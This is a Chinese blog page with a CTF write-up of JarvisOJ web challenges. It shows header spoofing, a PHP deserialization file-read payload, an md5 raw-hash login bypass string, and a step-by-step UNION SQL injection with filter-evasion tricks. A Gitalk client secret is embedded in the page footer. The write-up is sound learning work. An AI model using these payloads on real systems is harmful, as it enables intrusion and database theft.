<!DOCTYPE html>
<html>

<head><meta name="generator" content="Hexo 3.9.0">
  
  <title>JarvisOj - MINX&#39;s Blog</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  

  <link rel="shortcut icon" href="https://iminx.oss-cn-beijing.aliyuncs.com/%E5%B0%81%E9%9D%A2/head.png" type="image/png">
  <meta name="description" content="https://www.jarvisoj.com/">
<meta property="og:type" content="article">
<meta property="og:title" content="JarvisOj">
<meta property="og:url" content="http://iminx.cn/2019/11/27/JarvisOj/index.html">
<meta property="og:site_name" content="MINX&#39;s Blog">
<meta property="og:description" content="https://www.jarvisoj.com/">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-12-02T17:05:18.341Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="JarvisOj">
<meta name="twitter:description" content="https://www.jarvisoj.com/">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/css/mdui.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.15.8/styles/atom-one-dark.css">
   
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1038733_0xvrvpg9c0r.css">
  <link rel="stylesheet" href="/css/style.css?v=1580295864318">
</head>

<body class="mdui-drawer-body-left">
  
  <div class="nexmoe-bg" style="background-image: url(https://iminx.oss-cn-beijing.aliyuncs.com/%E5%B0%81%E9%9D%A2/4.jpg)"></div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/">
            <img src="https://iminx.oss-cn-beijing.aliyuncs.com/%E5%B0%81%E9%9D%A2/head.png">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>14</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>8</div>
    </div>
    <ul class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
    </ul>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/clhclh1/clhclh1.github.io" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/AWD/">AWD</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Bypass/">Bypass</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Docker/">Docker</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux基础命令/">Linux基础命令</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQL注入/">SQL注入</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Writeup/">Writeup</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/文件上传/">文件上传</a><span class="category-list-count">2</span></li></ul>
    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">十一月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">十月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">九月 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 MINX
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->

<script>
    const getRealPath = (pathname, desc = false) => {
        if (!pathname) {
            pathname = window.location.pathname
        }
        let names = pathname.split("/")
        if (desc === false) {
            for (let i = names.length - 1; i >= 0; --i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        } else {
            for (let i = 0; i < names.length; ++i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        }
        return "/"
    }
    let links = document.querySelectorAll('.nexmoe-list-item');
    let rootRealPath = getRealPath(window.location.pathname, true);
    for (let link of links) {
        let linkPath = link.getAttribute("href");
        if (linkPath && getRealPath(linkPath, true) === rootRealPath) {
            link.className = "active nexmoe-list-item mdui-list-item mdui-ripple";
        }
    }
</script>
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-tab">
            <a mdui-drawer="{target: '#drawer', swipe: true}">
              <i class="mdui-icon material-icons">menu</i>
            </a>
          </div>
        <div class="nexmoe-post">
    <div class="nexmoe-post-cover"> 
        
        <img src="https://iminx.oss-cn-beijing.aliyuncs.com/%E5%B0%81%E9%9D%A2/2.jpg">
        
        <h1>JarvisOj</h1>
    </div>
  <div class="nexmoe-post-meta">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年11月27日</a>
    <a><i class="nexmoefont icon-areachart"></i>1,015 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 5 分钟</a>
    
      <a class="nexmoefont icon-appstore-fill -link" href="/categories/Writeup/">Writeup</a>
    
    
  </div>
  <article>
    <p><a href="https://www.jarvisoj.com/" target="_blank" rel="noopener">https://www.jarvisoj.com/</a></p>
<a id="more"></a>

<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="LocalHost"><a href="#LocalHost" class="headerlink" title="LocalHost"></a>LocalHost</h2><p>抓包加一个“X-Forwarded-For: 127.0.0.1”完事</p>
<h2 id="PORT51"><a href="#PORT51" class="headerlink" title="PORT51"></a>PORT51</h2><p>刚开始以为改端口就完了，，后来发现是我太菜了，要改我们的访问端口<br><code>curl --loacl-port 51 http://web.jarvisoj.com:32770/</code>就拿到了flag，，学到了</p>
<h2 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h2><p>进去以后就是一张图片<br>先view-source一下看到了：<br><code>&lt;img src=&quot;showimg.php?img=c2hpZWxkLmpwZw==&quot; width=&quot;100%&quot;/&gt;</code><br>看到了一个showimg.php，看样子应该可以用img这个参数来读文件，先读一下showimg.php这个文件，没看到啥有用的东西，再看一下index.php看到了有一个反序列化的点，看样子是反序列化的题目，源码：</p>
<pre><code>&lt;?php 
    require_once(&#39;shield.php&#39;);
    $x = new Shield();
    isset($_GET[&#39;class&#39;]) &amp;&amp; $g = $_GET[&#39;class&#39;];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x-&gt;readfile();
?&gt;</code></pre><p>看到了shield.php，读一下看看：</p>
<pre><code>&lt;?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = &#39;&#39;) {
            $this -&gt; file = $filename;
        }

        function readfile() {
            if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&#39;..&#39;)===FALSE  
            &amp;&amp; stripos($this-&gt;file,&#39;/&#39;)===FALSE &amp;&amp; stripos($this-&gt;file,&#39;\\&#39;)==FALSE) {
                return @file_get_contents($this-&gt;file);
            }
        }
    }
?&gt;</code></pre><p>payload:</p>
<pre><code>&lt;?php

class Shield{
    public $file=&#39;pctf.php&#39;;
}
$c = new Shield();
echo serialize($c);
?&gt;</code></pre><p>“view-source:<a href="http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}&quot;" target="_blank" rel="noopener">http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}&quot;</a><br>就拿到了flag</p>
<h2 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h2><p>提示说需要密码才能拿到flag，，但是测试了一下发现当输入双引号的时候会报sql错误，应该是存在sql注入，但是测试了好久没发现有什么用，，看了一眼wp要先抓包，，在head里面有hint。。。<br>‘Hint: “select * from <code>admin</code> where password=’”.md5($pass,true).”‘“‘<br>然后想到应该是md5的安全问题，0e开头的问题应该是不存在，参考了一下<a href="https://www.cnblogs.com/piaomiaohongchen/p/10659359.html" target="_blank" rel="noopener">https://www.cnblogs.com/piaomiaohongchen/p/10659359.html</a><br>试了一下文中给出的密码ffifdyop就拿到了flag</p>
<h2 id="admin"><a href="#admin" class="headerlink" title="admin"></a>admin</h2><p>打开网页只有一个hello world，查看网页源代码没看到啥有用的东西，于是就看看有没有robots.txt，看到了admin_s3cr3t.php，访问拿到假的flag，想了想应该是跟cookie有关，于是就抓包看看，应该是在cookie有判断是不是admin，但是我抓到的包没有cookie，反而是看到一个类似于base64的一串编码，就一直在搞这个也没搞出个啥，后来看了一下wp别人就有抓到admin=0.。。。我就重新刷新重新抓了一下包才看到了这玩意，，改成1就拿到了flag，看来应该是还没有设置cookie就被我抓包了，，，害，下次注意</p>
<h2 id="IN-A-mess"><a href="#IN-A-mess" class="headerlink" title="IN A mess"></a>IN A mess</h2><p>1.查看网页源代码让我访问index.phps，看到源码</p>
<pre><code>&lt;?php

error_reporting(0);
echo &quot;&lt;!--index.phps--&gt;&quot;;

if(!$_GET[&#39;id&#39;])
{
    header(&#39;Location: index.php?id=1&#39;);
    exit();
}
$id=$_GET[&#39;id&#39;];
$a=$_GET[&#39;a&#39;];
$b=$_GET[&#39;b&#39;];
if(stripos($a,&#39;.&#39;))
{
    echo &#39;Hahahahahaha&#39;;
    return ;
}
$data = @file_get_contents($a,&#39;r&#39;);
if($data==&quot;1112 is a nice lab!&quot; and $id==0 and strlen($b)&gt;5 and eregi(&quot;111&quot;.substr($b,0,1),&quot;1114&quot;) and substr($b,0,1)!=4)
{
    require(&quot;flag.txt&quot;);
}
else
{
    print &quot;work harder!harder!harder!&quot;;
}


?&gt;</code></pre><p>可以看到主要就是那一层if</p>
<ol>
<li>$data用php://input传进去</li>
<li>id=0</li>
<li>b长度要大于5但是要满足第二、三层要长度为0，这时候就要让b=%0011111，strlen不会被截断，substr会被截断</li>
<li>然后让我们访问<a href="http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1，又看到了id=1，有可能是注入" target="_blank" rel="noopener">http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1，又看到了id=1，有可能是注入</a></li>
<li>用单引号测试发现直接返回了sql语句，那看来应该就是sql注入了</li>
<li>测试发现过滤了空格这个可以用注释符/**/绕过，但是发现直接用会被过滤，试着往里面加点东西就好了</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1/*1*/order/*1*/by/*1*/3#</code>测试得到字段数为3</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,database()/*1*/#</code>拿到数据库名是test</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,table_name/*1*/frofromm/*1*/information_schema.tables/*1*/where/*1*/table_schema=0x74657374#</code>拿到表名content</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frofromm/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74#</code>得到字段名是id,context,title</li>
<li>用<code>http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(context)/*1*/frofromm/*1*/content#</code>拿到flag</li>
</ol>

  </article>
  
    
<div class="nexmoe-post-copyright">
<i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
<strong>本文作者：</strong>MINX<br>
<strong>本文链接：</strong><a href="http://iminx.cn/2019/11/27/JarvisOj/" title="http://iminx.cn/2019/11/27/JarvisOj/" target="_blank" rel="noopener">http://iminx.cn/2019/11/27/JarvisOj/</a><br>

  <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可 <br> <a href="http://www.miitbeian.gov.cn/">闽ICP备19007766号</a>

</div>


  
  <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/js/mdui.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
 
    <script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>


 
    <script src="https://cdn.jsdelivr.net/npm/smoothscroll-for-websites@1.4.9/SmoothScroll.min.js"></script>


<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

<script src="/js/app.js?v=1580295864312"></script>
<script src="https://cdn.jsdelivr.net/npm/lazysizes@5.1.0/lazysizes.min.js"></script>

  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>